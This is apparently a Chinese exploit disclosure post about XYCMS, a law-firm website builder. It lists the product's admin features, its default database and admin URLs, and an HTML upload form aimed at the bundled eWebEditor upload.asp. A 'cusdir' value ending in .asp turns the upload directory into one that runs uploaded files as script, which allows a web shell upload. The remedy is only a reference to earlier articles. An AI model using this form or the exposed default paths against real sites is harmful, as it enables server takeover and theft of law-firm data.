by Mr.DzY  from www.0855.tv

源码简介：

XYCMS律师事务所建站系统包含事务所简介、律师风采、新闻中心、服务领域、典型案例、法律咨询、资格认证、联系我们等栏目。

后台功能：
企业信息管理：包括基本信息管理，添加，在线报名信息管理，问答中心信息管理
新闻中心管理：管理新闻信息内容，管理相关分类，添加或者删除
律师风采管理：对律师事务所成员进行管理，可添加，删除等操作

源码下载：http://www.2cto.com/ym/201109/29273.html

官方网站：http://www.yuleroom.cn
默认DATA：http://www.2cto.com /xydata/xycms.mdb
默认后台：http://www.2cto.com /system/index.asp

exploit:

<form action="http://www.2cto.com /system/xyeWebEditor/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp" method=post name=myform enctype="multipart/form-data">
<input type=file name=uploadfile size=100><br><br>
<input type=submit value=upload>
</form>

修复：上传漏洞参见本站以前文章
PS:由于在1.0版本中，有牛牛发布了若干个问题：http://www.2cto.com/Article/201102/83752.html，我就不一一说了。
这个是没说的，所以补充下。有点鸡肋,如有雷同，纯粹意外。